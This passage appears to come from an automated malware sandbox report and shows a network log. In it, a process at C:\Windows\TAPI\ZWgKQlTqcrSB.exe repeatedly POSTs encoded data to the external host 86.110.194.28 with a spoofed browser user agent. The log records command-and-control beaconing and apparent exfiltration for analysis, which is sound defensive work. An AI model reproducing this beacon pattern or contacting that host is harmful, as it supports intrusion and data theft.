                                                                                                                                                                        Data Ascii: [T^^]\P]T[YZ[RW[_RZYRVPHZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&C<.=#*?%/<*813![2/9P"75T#<X0)0</(#Y'$X.5
                                                                                                                                                                        Jan 3, 2025 07:58:50.444802046 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:50.575366020 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:50 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        75192.168.2.45008286.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:50.841310978 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:51.199306965 CET2516OUTData Raw: 5e 55 5b 5a 58 59 50 5c 54 5b 59 5a 5b 52 57 5b 5f 57 5a 55 52 57 50 48 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^U[ZXYP\T[YZ[RW[_WZURWPHZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&E(.>!*%)_$$2 7)Q 8?$'$+9#Y'$X.5


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        76192.168.2.45008386.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:51.393728018 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2108
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:51.746181965 CET2108OUTData Raw: 5b 54 5e 50 58 5e 50 51 54 5b 59 5a 5b 50 57 53 5f 54 5a 5f 52 53 50 45 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [T^PX^PQT[YZ[PWS_TZ_RSPEZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%)>2!9$R&$E(8*^$$)[11R"'*7; Y$#'/'?#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:58:52.105254889 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:52.240370035 CET380INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:51 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 0d 1d 24 5a 31 3b 2d 02 2a 11 2f 5f 26 33 07 12 36 33 3b 05 2c 1e 2e 0b 35 3f 3d 5b 32 05 01 0e 28 04 3d 1c 28 1d 03 12 23 10 0b 1d 2b 20 28 5d 03 10 39 5b 2b 13 0e 01 2a 58 2a 06 39 27 0d 5b 24 37 2b 03 29 20 21 56 32 3c 04 10 35 03 3f 1e 28 30 2d 5f 30 5d 3c 5c 2b 1e 30 07 27 17 20 54 0b 17 27 1c 27 23 38 03 27 2b 3a 04 3d 27 34 12 33 2a 3a 0e 21 3c 2e 19 34 39 2c 5b 38 30 21 1f 27 16 21 53 3d 00 3f 55 31 3a 04 59 27 3b 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                        Data Ascii: $Z1;-*/_&363;,.5?=[2(=(#+ (]9[+*X*9'[$7+) !V2<5?(0-_0]<\+0' T''#8'+:='43*:!<.49,[80!'!S=?U1:Y';.\#(U4WP


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        77192.168.2.45008486.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:51.538647890 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:51.886831045 CET2516OUTData Raw: 5b 54 5e 5b 5d 59 50 5b 54 5b 59 5a 5b 50 57 5a 5f 50 5a 58 52 50 50 44 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [T^[]YP[T[YZ[PWZ_PZXRPPDZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&D).%["9<U&>*$4"%<9S5'&#(Z00<,U+9#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:58:52.273046970 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:52.410296917 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:52 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        78192.168.2.45008586.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:52.543591976 CET304OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:58:52.902462959 CET2516OUTData Raw: 5b 52 5e 5f 58 5f 50 5a 54 5b 59 5a 5b 52 57 5c 5f 52 5a 55 52 51 50 41 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [R^_X_PZT[YZ[RW\_RZURQPAZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%+>#901,=+$\&1R!5 ^,$)C&<?+#Y'$X.5
                                                                                                                                                                        Jan 3, 2025 07:58:53.256978989 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:53.387706041 CET151INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:53 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        79192.168.2.45008686.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:53.523921013 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:53.871269941 CET2516OUTData Raw: 5b 53 5e 5a 5d 5e 55 5b 54 5b 59 5a 5b 54 57 5b 5f 55 5a 5d 52 50 50 41 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [S^Z]^U[T[YZ[TW[_UZ]RPPAZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&<=>!/10D*82[$=]%/)!75#+,Y0+0'(9#Y'$X.-
                                                                                                                                                                        Jan 3, 2025 07:58:54.259656906 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:54.392146111 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:54 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        80192.168.2.45008786.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:54.514493942 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:54.871294022 CET2516OUTData Raw: 5e 50 5b 58 58 5f 50 5b 54 5b 59 5a 5b 55 57 58 5f 5d 5a 55 52 51 50 44 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^P[XX_P[T[YZ[UWX_]ZURQPDZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%+=56 V&?;*;=$7)%&66#+#$)?$/0W+#Y'$X.)
                                                                                                                                                                        Jan 3, 2025 07:58:55.233513117 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:55.366475105 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:55 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        81192.168.2.45008886.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:55.499917984 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2504
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:55.855566025 CET2504OUTData Raw: 5e 57 5b 5f 58 5a 50 51 54 5b 59 5a 5b 57 57 5b 5f 51 5a 5b 52 51 50 41 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^W[_XZPQT[YZ[WW[_QZ[RQPAZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%<->62@((!061?"$78 ]0:;'(S?#Y'$X.5
                                                                                                                                                                        Jan 3, 2025 07:58:56.189351082 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:56.329700947 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:56 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        82192.168.2.45008986.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:56.453041077 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:56.808780909 CET2516OUTData Raw: 5b 5d 5b 5c 58 5b 55 5c 54 5b 59 5a 5b 5f 57 5b 5f 57 5a 54 52 54 50 42 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [][\X[U\T[YZ[_W[_WZTRTPBZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&B<>25/2<,)]!0%[%S!)W ($_+'Y;(#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:58:57.141479969 CET25INHTTP/1.1 100 Continue


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        83192.168.2.45009086.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:57.254015923 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2108
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:57.605590105 CET2108OUTData Raw: 5b 54 5e 59 58 5c 50 5b 54 5b 59 5a 5b 50 57 5e 5f 52 5a 5a 52 55 50 46 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [T^YX\P[T[YZ[PW^_RZZRUPFZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&<5"9$T%,*)$$%[1=Q6$&48$3, U<9#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:58:57.951577902 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:58.086545944 CET380INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:57 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 0d 1d 24 5c 25 2b 26 5b 3e 11 2f 59 31 30 3d 5e 21 0e 0e 14 2c 09 2e 09 21 3c 3a 03 25 02 38 1e 3c 5b 3d 18 29 23 03 1f 21 2e 21 1e 3f 30 28 5d 03 10 3a 05 3f 2e 2b 1f 2a 58 32 01 2c 34 27 17 24 0e 27 05 2a 20 39 13 25 12 35 0e 35 03 01 1e 3d 23 25 5b 27 05 01 02 2b 20 0d 12 27 17 20 54 0b 17 27 1e 33 30 06 01 31 06 25 5d 28 27 28 1f 27 39 25 53 22 02 0c 14 37 29 0a 16 2c 33 26 0f 27 2b 35 1e 2b 3e 27 56 32 14 21 01 26 3b 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                        Data Ascii: $\%+&[>/Y10=^!,.!<:%8<[=)#!.!?0(]:?.+*X2,4'$'* 9%55=#%['+ ' T'301%]('('9%S"7),3&'+5+>'V2!&;.\#(U4WP


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        84192.168.2.45009186.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:57.381808996 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:57.730564117 CET2516OUTData Raw: 5b 5d 5e 59 5d 5a 55 5b 54 5b 59 5a 5b 55 57 5d 5f 55 5a 58 52 5d 50 48 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: []^Y]ZU[T[YZ[UW]_UZXR]PHZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%(--_!\8W2<@=)0)X%<5!!8,3: 00T()#Y'$X.)
                                                                                                                                                                        Jan 3, 2025 07:58:58.101722956 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:58.240165949 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:57 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        85192.168.2.45009286.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:58.384593964 CET304OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:58:58.730741978 CET2516OUTData Raw: 5b 54 5b 5b 58 5f 50 5f 54 5b 59 5a 5b 50 57 5d 5f 53 5a 58 52 54 50 44 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [T[[X_P_T[YZ[PW]_SZXRTPDZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%+=!\"+1?/=.Z'4[%!W 3'_ C$,3?9#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:58:59.066411018 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:59.198621988 CET151INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:58 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        86192.168.2.45009386.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:59.326107979 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:59.683701038 CET2516OUTData Raw: 5e 57 5e 5f 58 5f 55 5d 54 5b 59 5a 5b 5e 57 5e 5f 5d 5a 54 52 51 50 43 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
